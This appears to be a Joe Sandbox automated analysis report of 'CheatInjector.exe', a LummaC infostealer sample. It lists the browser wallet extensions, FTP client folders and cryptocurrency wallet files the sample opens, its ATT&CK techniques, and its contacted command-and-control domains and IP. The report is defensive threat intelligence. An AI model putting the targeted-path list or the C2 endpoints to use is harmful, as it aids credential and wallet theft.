              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
              Source: Yara matchFile source: 00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CheatInjector.exe PID: 2892, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: CheatInjector.exe PID: 2892, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		111
              Process Injection              		1
              Masquerading              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		12
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Query Registry              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager151
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Deobfuscate/Decode Files or Information              		NTDS12
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information              		LSA Secrets1
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials11
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync33
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              CheatInjector.exe47%ReversingLabsWin32.Infostealer.Tinba
              CheatInjector.exe58%VirustotalBrowse
              CheatInjector.exe100%AviraHEUR/AGEN.1311191
              CheatInjector.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              crisiwarny.store1%VirustotalBrowse
              presticitpo.store1%VirustotalBrowse
              prinyveri.cfd17%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              crisiwarny.store
              		104.21.95.91
              		truetrueunknown
              prinyveri.cfd
              		unknown
              		unknowntrueunknown
              presticitpo.store
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              presticitpo.storetrue
                		unknown
                scriptyprefej.storetrue
                  		unknown
                  https://crisiwarny.store/apitrue
                    		unknown
                    necklacedmny.storetrue
                      		unknown
                      fadehairucw.storetrue
                        		unknown
                        prinyveri.cfdtrue
                          		unknown
                          navygenerayk.storetrue
                            		unknown
                            founpiuer.storetrue
                              		unknown
                              thumbystriw.storetrue
                                		unknown
                                crisiwarny.storetrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabCheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgCheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoCheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  https://crisiwarny.store/api/CheatInjector.exe, 00000001.00000002.1917876734.000000000159C000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1916727727.000000000159C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://crisiwarny.store/api#2CheatInjector.exe, 00000001.00000003.1881229138.0000000001645000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://crisiwarny.store/NCheatInjector.exe, 00000001.00000003.1816674082.0000000001658000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.rootca1.amazontrust.com/rootca1.crl0CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaCheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://upx.sf.netAmcache.hve.4.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ocsp.rootca1.amazontrust.com0:CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016CheatInjector.exe, 00000001.00000003.1793878352.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17CheatInjector.exe, 00000001.00000003.1793878352.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.ecosia.org/newtab/CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://crisiwarny.store/VCheatInjector.exe, 00000001.00000003.1881011106.0000000003C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://crisiwarny.store:443/apicCheatInjector.exe, 00000001.00000003.1880946723.0000000001624000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1904792982.0000000001624000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://crisiwarny.store:443/apiCheatInjector.exe, 00000001.00000003.1793599101.000000000162B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgCheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiCheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://crisiwarny.store/apiA2?CheatInjector.exe, 00000001.00000002.1918562210.0000000001648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://x1.c.lencr.org/0CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://x1.i.lencr.org/0CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.microsofCheatInjector.exe, 00000001.00000003.1793878352.0000000003C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://crisiwarny.store/CheatInjector.exe, 00000001.00000002.1919006642.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1832685841.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1867233180.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1850294553.0000000001624000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1817066637.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1816620533.0000000003C2E000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1849923534.0000000003C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://support.mozilla.org/products/firefoxgro.allCheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.95.91
                                                            		crisiwarny.storeUnited States
                                                            		13335CLOUDFLARENETUStrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1542679
                                                            Start date and time:2024-10-26 07:00:06 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 5m 57s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:9
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:CheatInjector.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@4/6@3/1
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 74%
                                                            • Number of executed functions: 7
                                                            • Number of non-executed functions: 152
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 20.42.65.92, 104.208.16.94
                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                            • Execution Graph export aborted for target CheatInjector.exe, PID 2892 because there are no executed function
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            01:01:07API Interceptor9x Sleep call for process: CheatInjector.exe modified
                                                            01:01:24API Interceptor1x Sleep call for process: WerFault.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.21.95.91file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              crisiwarny.storefile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.170.64
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 172.67.170.64
                                                              file.exeGet hashmaliciousLummaC, StealcBrowse
                                                              • 172.67.170.64

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 104.21.95.91
                                                              SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                              • 104.18.10.89
                                                              SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.170.64
                                                              SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              https://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
                                                              • 188.114.97.3
                                                              BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                              • 104.21.56.70
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 172.67.170.64
                                                              Rampage.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.26.13.205
                                                              file.exeGet hashmaliciousLummaC, StealcBrowse
                                                              • 172.67.170.64

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaC, StealcBrowse
                                                              • 104.21.95.91
                                                              Verus.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.95.91
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.95.91
                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 104.21.95.91

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CheatInjector.ex_32976456f53d9ed7895573c0f1b9b852cfa91eea_d88013b7_19b5572d-dc75-4c90-9317-befffdb2e13c\Report.wer

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):65536
                                                              Entropy (8bit):0.71526939389273
                                                              Encrypted:false
                                                              SSDEEP:192:zK0oVj0DlqX0BU/atzju1zuiFmZ24IO8cd:zPOOlnBU/gjczuiFmY4IO8E
                                                              MD5:AC2361E165B95075367E2C12879DA251
                                                              SHA1:FE008967F9C7EC6379FC85BF97C7A2D9B21C90AB
                                                              SHA-256:F06F8BCB138FB62C43D7288E1A55A60829A1C9D9DBCB8F0291EF04A0FD23A558
                                                              SHA-512:9CAD82341FC49EBBC2C429C061FC41C6831FF29D6413F8428AE171186583DB7455585F2DB65CF387B631079BD0B9F7347E0E6847713B71AF7210CFB5A08A0857
                                                              Malicious:false
                                                              Reputation:low
